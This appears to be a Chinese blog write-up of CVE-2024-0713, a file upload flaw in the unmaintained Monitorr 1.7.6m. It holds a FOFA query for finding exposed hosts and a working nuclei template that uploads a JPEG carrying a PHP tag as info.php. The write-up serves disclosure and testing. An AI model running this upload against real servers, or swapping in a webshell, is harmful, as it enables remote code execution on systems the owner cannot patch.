CVE-2024-0713 Monitorr 文件上传漏洞分析

0x00 概述
Monitorr是一个自托管的PHP网络应用,可以监控本地和远程网络服务、网站和应用的状态。经过分析,该系统存在文件上传漏洞,攻击者可以通过该漏洞上传webshell至目标系统从而获取目标系统权限。

字段 值 备注
漏洞编号 CVE-2024-0713
漏洞厂商 Monitorr
厂商官网 https://github.com/Monitorr/Monitorr
影响对象类型 Web应用
影响产品 Monitorr
影响版本 Monitorr 1.7.6m
0x01 漏洞影响
影响版本Monitorr 1.7.6m

0x02 漏洞环境
该产品为开源产品:https://github.com/Monitorr/Monitorr

fofa 查询语句为:

body=“assets/php/timestamp.php”

0x03 漏洞验证和利用
先随便找一个图片,这里用python生成:

from PIL import Image

img = Image.new(‘RGB’, (1, 1), color = (0, 0, 0))
img.save(‘small.jpg’, ‘JPEG’)
然后在图片的末尾添加webshell

使用nuclei进行测试:

id: poc
info:
name: 直接上传文件
author: xxx
severity: high
description: 产品已经停止更新,影响全版本,直接文件上传
http:

  • raw:
    • |
      POST /assets/php/upload.php HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4)
      Accept-Encoding: gzip, deflate
      Accept: /
      Connection: close
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMmx988TUuintqO4Q
      Content-Length: 1194

      ------WebKitFormBoundaryMmx988TUuintqO4Q
      Content-Disposition: form-data; name=“fileToUpload”; filename=“info.php”
      Content-Type: image/jpeg

      {{base64_decode(“/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAABAAEDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD5/ooooA//2Tw/PXBocGluZm8oKTs/Pg==”)}}
      ------WebKitFormBoundaryMmx988TUuintqO4Q–
      unsafe: false
      cookie-reuse: false
      matchers-condition: or
      matchers:

    • type: word
      part: body
      words:

      • usrimg/info.php
        condition: or

0x04 漏洞分析
漏洞的位置在 assets\php\upload.php ,直接就是文件上传,唯一的检查是调用 getimagesize() 判断图片是否满足格式:

0x05 漏洞修复
该产品已经停止更新

  • 12
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

互助小修项目总监任友

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值